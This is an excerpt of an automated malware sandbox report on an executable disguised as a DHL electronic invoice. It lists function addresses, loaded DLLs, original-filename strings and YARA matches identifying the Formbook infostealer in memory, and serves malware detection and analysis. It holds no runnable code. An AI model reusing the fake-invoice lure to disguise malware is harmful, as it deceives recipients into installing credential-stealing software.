Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019FDAC6	5_2_019FDAC6
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A07A46	5_2_01A07A46
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0FA49	5_2_01A0FA49
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C3A6C	5_2_019C3A6C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196FDC0	5_2_0196FDC0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A07D73	5_2_01A07D73
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01953D40	5_2_01953D40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A01D5A	5_2_01A01D5A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0FCF2	5_2_01A0FCF2
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C9C32	5_2_019C9C32
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01951F92	5_2_01951F92
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0FFB1	5_2_01A0FFB1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0FF09	5_2_01A0FF09
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01959EB0	5_2_01959EB0
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCEB5CD	6_2_0DCEB5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCDFD02	6_2_0DCDFD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCE5912	6_2_0DCE5912
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCDE082	6_2_0DCDE082
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCE7036	6_2_0DCE7036
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCE2B32	6_2_0DCE2B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCE2B30	6_2_0DCE2B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0DCE8232	6_2_0DCE8232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E071232	6_2_0E071232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E070036	6_2_0E070036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E067082	6_2_0E067082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E068D02	6_2_0E068D02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E06E912	6_2_0E06E912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E06BB32	6_2_0E06BB32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E06BB30	6_2_0E06BB30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E0745CD	6_2_0E0745CD
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D6E4F6	7_2_04D6E4F6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D72446	7_2_04D72446
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D64420	7_2_04D64420
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D80591	7_2_04D80591
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC0535	7_2_04CC0535
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CDC6E0	7_2_04CDC6E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CBC7C0	7_2_04CBC7C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CE4750	7_2_04CE4750
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC0770	7_2_04CC0770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D52000	7_2_04D52000
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D781CC	7_2_04D781CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D801AA	7_2_04D801AA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D48158	7_2_04D48158
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CB0100	7_2_04CB0100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D5A118	7_2_04D5A118
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D402C0	7_2_04D402C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D60274	7_2_04D60274
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CCE3F0	7_2_04CCE3F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D803E6	7_2_04D803E6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7A352	7_2_04D7A352
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CB0CF2	7_2_04CB0CF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D60CB5	7_2_04D60CB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC0C00	7_2_04CC0C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CBADE0	7_2_04CBADE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CD8DBF	7_2_04CD8DBF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D5CD1F	7_2_04D5CD1F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CCAD00	7_2_04CCAD00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7EEDB	7_2_04D7EEDB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7CE93	7_2_04D7CE93
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CD2E90	7_2_04CD2E90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC0E59	7_2_04CC0E59
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7EE26	7_2_04D7EE26
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CB2FC8	7_2_04CB2FC8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CCCFE0	7_2_04CCCFE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D3EFA0	7_2_04D3EFA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D34F40	7_2_04D34F40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D62F30	7_2_04D62F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D02F28	7_2_04D02F28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CE0F30	7_2_04CE0F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CEE8F0	7_2_04CEE8F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CA68B8	7_2_04CA68B8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CCA840	7_2_04CCA840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC2840	7_2_04CC2840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC29A0	7_2_04CC29A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D8A9A6	7_2_04D8A9A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CD6962	7_2_04CD6962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CBEA80	7_2_04CBEA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D76BD7	7_2_04D76BD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7AB40	7_2_04D7AB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CB1460	7_2_04CB1460
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7F43F	7_2_04D7F43F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D5D5B0	7_2_04D5D5B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D77571	7_2_04D77571
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D716CC	7_2_04D716CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7F7B0	7_2_04D7F7B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC70C0	7_2_04CC70C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D6F0CC	7_2_04D6F0CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7F0E0	7_2_04D7F0E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D770E9	7_2_04D770E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CCB1B0	7_2_04CCB1B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF516C	7_2_04CF516C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D8B16B	7_2_04D8B16B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CAF172	7_2_04CAF172
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CDB2C0	7_2_04CDB2C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D612ED	7_2_04D612ED
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC52A0	7_2_04CC52A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D0739A	7_2_04D0739A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CAD34C	7_2_04CAD34C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7132D	7_2_04D7132D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7FCF2	7_2_04D7FCF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D39C32	7_2_04D39C32
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CDFDC0	7_2_04CDFDC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC3D40	7_2_04CC3D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D71D5A	7_2_04D71D5A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D77D73	7_2_04D77D73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC9EB0	7_2_04CC9EB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC1F92	7_2_04CC1F92
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7FFB1	7_2_04D7FFB1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7FF09	7_2_04D7FF09
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC38E0	7_2_04CC38E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D2D800	7_2_04D2D800
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CC9950	7_2_04CC9950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CDB950	7_2_04CDB950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D55910	7_2_04D55910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D6DAC6	7_2_04D6DAC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D05AA0	7_2_04D05AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D61AA3	7_2_04D61AA3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D5DAAC	7_2_04D5DAAC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D77A46	7_2_04D77A46
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7FA49	7_2_04D7FA49
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D33A6C	7_2_04D33A6C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D35BF0	7_2_04D35BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CFDBF9	7_2_04CFDBF9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CDFB80	7_2_04CDFB80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04D7FB76	7_2_04D7FB76
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1EB6E	7_2_02D1EB6E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1E84B	7_2_02D1E84B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D02FB0	7_2_02D02FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D02D90	7_2_02D02D90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D02D87	7_2_02D02D87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D09E50	7_2_02D09E50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D09E4C	7_2_02D09E4C

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: String function: 01985130 appears 58 times
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: String function: 019CF290 appears 105 times
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: String function: 01997E54 appears 102 times
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: String function: 0193B970 appears 280 times
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: String function: 019BEA12 appears 86 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04D3F290 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04CF5130 appears 58 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04CAB970 appears 280 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04D07E54 appears 102 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04D2EA12 appears 86 times

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1465867346.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000000.1409330070.00000000005F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametuHT.exe8 vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1474227985.0000000006C98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000000.00000002.1474534222.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532555059.0000000001A3D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532295892.00000000013E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe, 00000005.00000002.1532450254.0000000001813000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamesystray.exej% vs DHL Factura Electronica Pendiente documento No 04BB25083.exe
Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe	Binary or memory string: OriginalFilenametuHT.exe8 vs DHL Factura Electronica Pendiente documento No 04BB25083.exe

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: wininet.dll	Jump to behavior

Source: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
